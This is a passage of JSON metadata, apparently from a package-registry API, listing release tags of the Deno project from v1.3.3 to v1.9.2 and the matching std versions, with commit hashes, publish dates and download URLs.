c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosy